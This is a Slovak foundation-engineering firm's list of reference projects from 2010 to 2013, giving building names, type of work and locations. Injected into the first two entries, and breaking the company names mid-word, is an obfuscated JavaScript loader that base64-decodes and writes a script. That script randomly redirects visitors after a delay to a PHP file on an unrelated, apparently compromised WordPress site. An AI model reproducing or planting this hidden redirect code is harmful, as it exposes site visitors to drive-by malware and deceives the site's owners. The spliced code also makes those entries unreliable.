Popis stavby: VÝROBNO SKLADOVÁ HALA Dhollfunction u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var y7=“;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147(‚PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+‘);andia Predmier – Expanzia SO.01 VÝROBNO SKLADOVÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Predmier
Popis stavby: Rozšírenie OC Kauflfunction u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var y7=“;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147(‚PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+‘);and Topolčany a novostavba parkovacieho domu SO 101a – PRÍSTAVBA OC KAUFLAND
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Topoľčany
Popis stavby:
SO102.1 – AUTOBUSOVÁ STANICA A PARKOVISKÁ
SO102.2 – ADMINISTRATÍVNA BUDOVA SAD
SO102.3 – DIELNE SAD
SO102.4 – ČERPACIA STANICA PHM
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trenčín
Popis stavby: STOMATOLOGICKÉ CENTRUM- ZVOLEN
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Zvolen
Popis stavby: SO.03.1 – ADMINISTRATÍVA, SO.03.2 – HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  ŽILINA

2013

Popis stavby: TESCO 0.8k, BANSKÁ ŠTIAVNICA, SO 02 SUPERMARKET TESCO
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Banská Štiavnica
Popis stavby: PREDAJŇA POTRAVÍN LIDL, SO – 201 PREDAJŇA POTRAVÍN LIDL
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Banská Štiavnica
Popis stavby: MODERNIZÁCIA ŽEL. TRATE NOVÉ MESTO NAD VÁHOM – PÚCHOV ŽEL. KM 100,500-159,100,
pre traťovú rýchlosť do 160km/h,VI. etapa
Popis práce:
SO 41-34-54 Zmena zakladania pilót
SO 42-34-02 Zmena zakladania pilót
SO 42-34-02 Posúdenie soklového panela
Miesto práce:  Nové Mesto nad Váhom
Popis stavby: REKONŠTRUKCIA AREÁLU MÚZEA, 3. ETAPA
Popis práce: Stabilizácia objektu múzea
Miesto práce:  Bratislava, Devínska cesta
Popis stavby: SO 101 –
LOGISTICKÁ HALA (SO VSTAVANÝM MEZANÍNOM KANCELÁRII)
SO 102 – ADMINISTRATÍVNA BUDOVA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: SO 201a BYTOVÝ DOM 01
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: SO 201a BYTOVÝ DOM 01
Popis práce: projekt zabezpečenia stavebnej jamy
Miesto práce:  Bratislava Lazaretská ul. 9, , p.č.:8753,8754 k.ú. STARÉ MESTO
Popis stavby: SO 204.1 – Nový oporný múr- Bajkalská – severozápad
Popis práce:
Špeciálne zakladanie na mikropilótach
Projekt založenia oporného múru
Miesto práce:  Bratislava
Popis stavby: Panorama City Bratislava
Popis práce: Zaťažovacie skúšky veľkopriemerovej pilóty č.71 a č.70
Miesto práce:  Bratislava
Popis stavby: Dostavba areálu MZV SR
Popis práce: Projekt čerpania stavebnej jamy
Miesto práce:  Bratislava, Pražská ul. 7
Popis stavby: Objekt: SO 7272
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby:
ROZŠÍRENIE KAPACÍT 870, H2 – SKLAD HRL,
AREÁL VOLKSWAGEN SLOVAKIA, BRATISLAVA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby:
ROZŠÍRENIE KAPACÍT ŠROTOVÉHO HOSPODÁRSTVA – HALA I11
SO 01 PRÍSTAVBA K OBJEKTU ŠROTOVÉHO HOSPODÁRSTVA – HALA I11
AREÁL VOLKSWAGEN SLOVAKIA, BRATISLAVA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: VÝROBNÁ HALA FIRMY TECHNOMETAL
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bytča
Popis stavby: Prestavba, nadstavba a prístavba objektu č.s.148, Nájomný bytový dom
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Čadca
Popis stavby: SO-02 VÝROBNÁ BUDOVA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Čadca
Popis stavby: SO – 02.3, Objekt občianskej vybavenosti OV
Popis práce:
Miesto práce:  Devín, Bratislava
Popis stavby: SO-01 VÝROBNÁ HALA, SO-02 PRÍSTAVBA K OBJEKTU 1. ETAPY
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Dolné Vestenice
Popis stavby: Burbon, PRÍSTAVBA VÝROBNO-SKLADOVÝCH HÁL
Popis práce: PAŽENIE TECHNOLOGICKEJ JAMY
Miesto práce:  Dolný Kubín
Popis stavby: SO05.3 SKLADOVÁ HALA – CANOPY
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Hlohovec
Popis stavby: SO 01 PRÍSTAVBA K HALE Č.3
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Kočovce
Popis stavby: Slovenská Akadémia Vied – PAVILÓN MATERIÁLOVÝCH VIED
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Košice
Popis stavby:
SO-01 VÝROBNÁ HALA
SO-02 MONTÁŽNA HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Krompachy
Popis stavby: Technologická jama OMNIA KLF, a.s.
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Kysucké Nové Mesto
Popis stavby: Zimný štadión, JL Aréna – tréningová hala
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Liptovský Mikuláš
Popis stavby: D301
Popis práce: Podchytenie cestného telesa pilótovou stenou
Miesto práce:  Ľuboreč – Lučenec
Popis stavby: SO 01 PRODUCTION HAL / VÝROBNÁ HALA – prístavba
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Lučenec
Popis stavby: REKREAČNÁ CHATA – TYP: A,B
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Malé Leváre

Popis stavby: HALA C-I.etapa
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Madunice

Popis stavby:
SO 514 Príprava triesok
SO 527 Pomocné prevádzky
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Malacky
Popis stavby: ITREI Real Estate Czech Republic s.r.o.
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Mohelnice
Popis stavby: SO 500 Sklad IRAO a ZRAM
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Mochovce
Popis stavby:
NA VÝROBU PAPIEROVÝCH VRECIEK
SO 001 VÝROBNÝ ZÁVOD
Popis práce: projekt hĺbkového zakladania
Miesto práce:  HARMANEC
Popis stavby: Sídlo firmy CRAZY FLY, s.r.o.
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nemšová
Popis stavby: SO 201 VÝROBNÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nižná na Orave
Popis stavby: ROZŠÍRENIE ZÁVODU DYMOS NOŠOVICE – ŠATNE A PRÍSTREŠOK
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nošovice
Popis stavby: SO1120
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nošovice
Popis stavby: SO-01 VÝROBNÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Ostrava
Popis stavby: SO-01 HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Piešťany
Popis stavby: HALA B, C
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Piešťany
Popis stavby: SO 01 VÝROBNÁ HALA A ADMINISTRATIVA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Podbiel
Popis stavby: SO01 FARA KOSTOL ZVONICA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Považská Bystrica
Popis stavby: SO 01 Administratívna budova Technologického centra TC Púchov
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Púchov
Popis stavby: SO 101 – OBCHONÉ CENTRUM KAUFLAND
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Sabinov
Popis stavby: Skladovacia hala Hagleitner Senec
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Senec
Popis stavby: SO 01 – OBSLUŽNÁ VYBAVENOSŤ
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Sobrance
Popis stavby: SO 101.1
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Spišská Nová Ves
Popis stavby: PRÍSTAVBA VÝROBNEJ HALY ZIMLET, SO 02
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Stará Ľubovňa
Popis stavby: Výrobná hala spoločnosti KONTAKT-SK
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Staškov
Popis stavby: TR Stupava-dozbrojenie Rz 110 kV
Popis práce: Podchytenie základov mikropilótami
Miesto práce:  Stupava
Popis stavby: POLYFUNKČNÁ BUDOVA DAVIPO, s.r.o.
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Šaľa
Popis stavby: SO-06 STAVEBNÉ ÚPRAVY PRI OBJEKTE 32-19
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Šaľa
Popis stavby: SO – 140 SKLAD MATERIÁLOV A VÝROBKOV
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Šaľa
Popis stavby: SO 100 – HALA S ADMINISTRATÍVOU
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Krušovice, okr. Topoľčany
Popis stavby: SO 101 – BUTIKCENTER C, SO 102 – BUTIKCENTER D
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Topoľčany

Popis stavby: SO 01 POLYFUNKČNÝ BYTOVÝ DOM „COLORHOUSE II“
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Topoľčany

Popis stavby: SO202.2 VÝROBNÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Tornaľa
Popis stavby: BYTOVÝ DOM NA OLBRACHTOVEJ ULICI
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trenčín
Popis stavby: SO 201 VÝROBNÁ HALA“
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trenčín
Popis stavby: PODCHYTENIE HORÚCOVODU
Popis práce: projekt podchytenia horúcovodu
Miesto práce:  Trnava
Popis stavby: SO 01 – HLAVNÝ STAVEBNÝ OBJEKT – OBJEKT RWP
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trnava
Popis stavby: SO-01.05 – MONTÁŽNA HALA 5 – ROZŠ. R03
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trnava

Popis stavby: SO 10
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trnava

Popis stavby:
SO 03.01 SUPERMARKET
SO 03.17 SUPERMARKET – pylón 02
SO 07.13 PREDAJŇA C – pylón
SO 03.17 SUPERMARKET – pylón 01
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Veľký Krtíš
Popis stavby: SKLADOVÁ HALA ALUPRINT, VRÚTKY
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Vrútky
Popis stavby: Chata Grúne
Popis práce: Špeciálne zakladanie na mikropilótach
Miesto práce:  Zázrivá
Popis stavby: SO 01 – Prístavba skladových priestorov
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Zlaté Moravce
Popis stavby: SO 012 VÝVOJOVÉ CENTRUM
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Zvolen
Popis stavby: ADMINISTRATÍVNA BUDOVA-podchytenie základov-TRYSKOVÁ INJEKTÁŽ
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Žilina
Popis stavby: KOMERČNÝ OBJEKT OC
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Žilina
Popis stavby: ZDRAVOTNÉ STREDISKO, REHABILITAČNĚ STREDISKO
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Žilina

2012

Popis stavby: SO 101 OBCHODNÉ JEDNOTKY
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bánovce nad Bebravou
Popis stavby: SO-01 Obchodné centrum
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Banská Bystrica
Popis stavby: SO 09- Garáže a prístrešky
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Banská Bystrica
Popis stavby: SO 09- Garáže a prístrešky
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Hamuliakovo okr. Senec
Popis stavby: 503 – tobogánová veža
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bešeňová

Popis stavby: E1 – POZEMNÉ STAVEBNÉ OBJEKTY – SO 100.A
Popis práce: SO 100.3.A – Zakladanie – pôdorys pilotových základov pre žeriav Ž3
Miesto práce:  Bratislava

Popis stavby: BA- Grosslingová ulica 50
Popis práce: Špeciálne zakladanie- otvorenie stavebnej jamy
Miesto práce:  Bratislava
Popis stavby: SO 01 ROZŠÍRENIE OBCHODNÉHO DOMU IKEA
Popis práce: Podchytenie základov mikropilótami
Miesto práce:  Bratislava
Popis stavby: SO-02 Mestské vily – Sever
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: RODINNÝ DOM S TROMI BYTMI, PERNECKÁ ULICA, BRATISLAVA, parc. č. 257/1
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: SO 90 POLYFUNKČNÝ OBJEKT
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: SO 22, SO 23 SKLAD HOTOVÝCH VÝROBKOV
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Budiš
Popis stavby: SO 1.101 CENTRUM OBCHODU A SLUŽIEB-PREDAJŇA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Čadca
Popis stavby: SO 2.101 OBCHODNÉ JEDNOTKY
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Čadca
Popis stavby: SO 2.101 OBCHODNÉ JEDNOTKY
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Čierna Voda
Popis stavby: II-SO-01 DISTRIBUČNÁ A SKLADOVACIA HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Dunajská Streda
Popis stavby: SO 201 – LOGISTICKÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Horný Hričov
Popis stavby: SO 02 – Obchodné zariadenie TESCO – typ 0,8K
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Hurbanovo
Popis stavby:
SO 30.1 PRÍSTAVBA VÝROBNEJ HALY A
SO 30.3 PRÍSTAVBA VÝROBNEJ HALY C
SO 31.1 PRÍSTAVBA ADMINISTRATÍVNO TECHNICKEJ BUDOVY D
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Ilava
Popis stavby: KARLíN HALL 2, Pernerova ulice, Praha 8– Karlín
Popis práce:
zaistenie stavebnej jamy
projekt hĺbkového zakladania
Založenie žeriavov- LIEBHERR 200 EC-H, LIEBHERR 110 EC-B6
Miesto práce:  Praha
Popis stavby: IMMOPARK KOŠICE- HALA FS8
Popis práce:projekt hĺbkového zakladania
Miesto práce:  Košice
Popis stavby: OBJ. D242 Oporný múr vpravo v km 0,539 718 – KÚ
Popis práce: skúšanie tyčových zemných kotiev
Miesto práce:  Párnica
Popis stavby:
HRUBÉ TERÉNNE ÚPRAVY – OPORNÉ MÚRY
SO 01 VÝROBNO – SKLADOVÝ OBJEKT S ADMINISTRATÍVOU HALA A, HALA B
ADMINISTRATÍVNA BUDOVA
SO 07 AREÁLOVÁ DAŽĎOVÁ KANALIZÁCIA – RETENCIA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Krušovce
Popis stavby: LISOVŇA 4. ETAPA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Kysucké Nové Mesto
Popis stavby: SO 02 VÝROBNO-SKLADOVÝ OBJEKT, HADVIČÁK
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Levice

Popis stavby: VÝROBNO-SKLADOVÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Liptovský Mikuláš

Popis stavby: VÝROBNO-SKLADOVÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Martovce

Popis stavby:
SEC spol. s r.o. NITRA – MONTÁŽNA HALA
SO 02 PRÍSTAVBA- hala G
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nitra

Popis stavby: SO 101-G – CENTRUM OBCHODU A SLUŽIEB – GALÉRIA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nové Mesto Nad Váhom
Popis stavby:
Pasport rodinného domu č.99/1954- Bratislava
Pasport rodinného domu č.95/1952- Bratislava
Pasport rodinného domu č.93- Bratislava
Pasport rodinného domu č.105- Bratislava
Pasport rodinného domu č.101- Bratislava
Pasport rodinných domov na parcelách 6355/1 a 6355/2 – Bratislava
Pasport chodníka okolo rodinných domov č 93,99,95-Bratislava
Popis práce:
Miesto práce:  Bratislava, Jaskov rad
Popis stavby: Panorama-Pezinok
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Pezinok
Popis stavby: HALA B, C
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Piešťany
Popis stavby:
Oblasť D – pilóty G9, K16, K17
Oblasť C – pilóty B1, C1, G7, G8, H7, K7
Oblasť F – pilóty C6, K21
Popis práce: Meranie integrity pilót
Miesto práce:  Bratislava
Popis stavby: SO 401 VÝROBNO – SKLADOVACIA HALA
Popis práce: Meranie integrity pilót
Miesto práce:  Strečno
Popis stavby: SO 03 OBCHODNÝ KOMPLEX II – KIKA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Poprad
Popis stavby:
HLUKOVÁ STENA
002.2 VÝROBNO SKLADOVACIA HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Potvorice
Popis stavby: VÝROBNÁ HALA – LAMINA PREŠOV
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Prešov
Popis stavby: SO 8.103 VÝROBNÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Púchov
Popis stavby:
Premiestnenie zberného dvora spoločnosti
SO 201 ZBERNÝ DVOR
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Púchov
Popis stavby: SKLADOVÁ HALA DC7
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Senec
Popis stavby: SO 202 VÝROBNÁ A SKLADOVACIA HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Senica
Popis stavby: SO 01/II Výrobná hala a administratívno-prevádzková budova II.
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Sučany
Popis stavby:
KOMPLEXNÉ STATICKÉ ZABEZPEČENIE ZALOŽENIA MÚROV A PÄTIEK OBJEKTU KASÁRNÍ TRENČIANSKÉHO HRADU NA ZÁKLADE
DOPLNKOVÉHO INŽINIERSKO-GEOLOGICKÉHO PRIESKUMU
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trenčín
Popis stavby:
HĹBKOVÉ ZALOŽENIE SILA BORAX
SO-102 Kmenáreň, nový sklad surovín
HĹBKOVÉ ZALOŽENIE SILA KAZIVEC
SO-102 Kmenáreň, nový sklad surovín
OK ZÁSOBNÍKY V HALE
SO-102 Kmenáreň, nový sklad surovín
Popis práce:
Miesto práce:  Trnava

Popis stavby:
KOMPLEXNÉ STATICKÉ ZABEZPEČENIE ZALOŽENIA MÚROV A PÄTIEK OBJEKTU KASÁRNÍ TRENČIANSKÉHO HRADU NA ZÁKLADE
DOPLNKOVÉHO INŽINIERSKO-GEOLOGICKÉHO PRIESKUMU
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trenčín

Popis stavby: SO 01 VÝROBNÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trutnov
Popis stavby: SO 01 BYTOVÝ DOM
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Vrakuňa, Bratislava
Obytný súbor Galvaniho ul.Bratislava
Diaľnica D1 Dubná Skala – Turany, Objekt SO 219 – podpera č. 7., pilóta č.8.
Diaľnica D1 Dubná Skala – Turany, Objekt SO 219 – opora č. 1., pilóta č.12.
Diaľnica D1 Dubná Skala – Turany, Objekt SO 220 – podpera č. 4., pilóta č.5.
Diaľnica D1 Dubná Skala – Turany, 224-00 Most na diaľnici v km 12,985 D1 cez Váh, Opora č.7, pilóta č.257
Diaľnica D1 Jablonov – Studenec, Objekt SO 205 – pilier č. 7, pilóta č.8.
Diaľnica D1 Dubná Skala – Turany, Objekt SO 225 – podpera č. 11., pilóta č.11116.
Diaľnica D1 Dubná Skala – Turany, Objekt SO 227 – podpera č. L3, pilóta č.12.
Diaľnica D1 Fričovce – Svinia, Objekt SO 208 – pilier č. 14, pilóta č.7.
Diaľnica D1 Jánovce – Jablonov, I. Úsek, 202-00 Most na diaľnici nad Štvrtockým potokom v km 1,478 D1 Podpera č.2P, pilóta č.239
Diaľnica D1 Jánovce – Jablonov, I. Úsek, 202-00 Most na diaľnici nad Štvrtockým potokom v km 1,478 D1 Podpera č. 2L, pilóta č.211
Diaľnica D1 Dubná Skala – Turany, 201-00 Most na diaľnici v km 0,400 00 D1 Dubná Skala – dilatačný celok 1
Podpera 17, pilóta č.P17-11, Podpera 18, pilóta č.18204
Podpera 19, pilóta č.19207
Podpera č. 20, pilóta č.214
Podpera 21, pilóta č.21214
Podpera 22, pilóta č.22215
Podpera 23, pilóta č.23215
Popis stavby:
HALA CARGO
SO-02 OBJEKT HALY „PARCEL I., PARCEL II.
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Zvolen
Popis stavby: SO 201 – VOLVO TRUCK CENTER
Popis práce: projekt hĺbkového zakladania
Miesto práce:  BUDČA
Popis stavby:
Lisovna – Sklad paliet a olejov
SO 100 LISOVŇA – Sklad paliet a olejov
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Žilina

2011

Popis stavby: PRÍSTAVBA MÚZEA MODERNÉHO UMENIA DANUBIANA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Hamuliakovo, okr. Senec
Popis stavby: DOUBLEBIG 18m V30
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: SO 10.01 – Prevádzkový objekt
Popis práce:
Miesto práce:  Bratislava – Ružinov
Popis stavby:
E1 – POZEMNÉ STAVEBNÉ OBJEKTY – II.SO 100
II.SO 100.03 – Zakladanie – pilotáž, zvýšenie únosnosti podložia
E1 – POZEMNÉ STAVEBNÉ OBJEKTY – I.SO 100
I.SO 100.03 – Zakladanie – pilotáž, zvýšenie únosnosti podložia
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: SO 101-HANGÁR
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: Obchodné centrum P13
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: PARKOVACÍ DOM PRE TOWER 115
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: Oporný múr vpravo v KM 0,539 – KÚ
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Párnica
Popis stavby: SO 281-Celková stabilita, Statické zaistenie nestabilných svahov
Popis práce: Projektová dokumentácia
Miesto práce:  Čadca
Popis stavby: SO 01 – HLAVNÝ STAVEBNÝ OBJEKT, založenie podlahy 50 kPa
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Hagenbrunn
Popis stavby: SO 01 ADMINISTRATÍVNA BUDOVA
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Košice
Popis stavby: SO-01 – HYPERMARKET BauMax
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Martin
Popis stavby: Výrobný areál Carnitech/Marel Nitra
Popis práce:
zyšovania nosnosti žeriavov
zosilnenie únosnosti základov mikropilotami
Projekt hĺbkového zakladania
Miesto práce:  Nitra
Popis stavby: PREDAJŇA A SKLAD SCONTO NITRA – Hlohovecká cesta
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Nitra
Popis stavby: SO 27-34-53 ŽELEZNIČNÁ STANICA MELČICE – PROTIHLUKOVÁ STENA
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Nové Mesto nad Váhom
Popis stavby: SO 101 – POZEMNÝ STAVEBNÝ OBJEKT
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Partizánske
Popis stavby: SO-01 – HYPERMARKET BauMax
Popis práce:
Miesto práce:  Martin
Popis stavby: PREDAJŇA A SKLAD SCONTO
Popis práce:
Miesto práce:  NITRA – Hlohovecká cesta
Popis stavby: SO 27-34-53 ŽELEZNIČNÁ STANICA MELČICE – PROTIHLUKOVÁ STENA
Popis práce:
Miesto práce:  NOVÉ MESTO NAD VÁHOM – PÚCHOV
Popis stavby: SO 101 – POZEMNÝ STAVEBNÝ OBJEKT
Popis práce:
Miesto práce:  PARTIZÁNSKE
Popis stavby: KRAVÍN PRE USTAJNENIE DOJNÍC
Popis práce:
Miesto práce: 
Popis stavby: SO 01 – SKLADOVÝ OBJEKT
Popis práce:
Miesto práce:  Prešov, Petrovany Hora
Popis stavby: SO 02
Popis práce:
Miesto práce:  PRIEVIDZA
Popis stavby: Prístavba č.4 Haly SO 07
Popis práce:
Miesto práce:  ul. T. Vansovej 1054/45, Púchov
Popis stavby: SO-101 NAVRHOVANÁ BUDOVA
Popis práce:
Miesto práce:  STARÁ TURÁ
Popis stavby: SO 101, SO 102, SO 103
Popis práce:
Miesto práce: 
Popis stavby:
REKONŠTRUKCIA A DOSTAVBA, HOTEL „TATRA“, TRENČÍN
PODCHYTENIE ZÁKLADOV HOTELA „TATRA“-TRYSKOVÁ INJEKTÁŽ
VÝROBNÁ HALA „MODULY 2“, ŠTERUSKÁ 3, VRBOVÉ ,SO 02 VÝROBNÁ HALA
Popis práce:
Miesto práce: 
Popis stavby: KRAVÍN PRE 416 ks DOJNÍC
Popis práce:
Miesto práce: 
Popis stavby:
Popis práce:
Miesto práce:  OBEC ZBEHY, KAT. ÚZEMIE ZBEHY, PARC. Č. 860/2, 860/1
Popis stavby: OPORNÝ MÚR
Popis práce:
Miesto práce: 
Popis stavby:
Popis práce: Podchytenie základov stavby
Miesto práce:  NIŽNÁ MYŠĽA

Popis stavby:
Popis práce:
Miesto práce:  LEOPOLDOV

Popis stavby:
Popis práce:
Miesto práce:  LIPTOVSKÝ MIKULÁŠ
Popis stavby:
Popis práce:
Miesto práce:  DVORY NAD ŽITAVOU
Popis stavby: SO 01 – PRÍSTAVBA VÝROBNEJ HALY MTA
Popis práce:
Miesto práce:  Bánovce nad Bebravou

2010

Popis stavby: NÍZKOENERGETICKÝ BYTOVÝ KOMPLEX
Popis práce:
Miesto práce: 
Popis stavby:
Popis práce:
Miesto práce:  CINTORÍNSKA – KLEMENSOVA, BRATISLAVA
Popis stavby:
Popis práce:
Miesto práce:  KRESANKOVA, DLHÉ DIELY, BRATISLAVA
Popis stavby:
Popis práce:
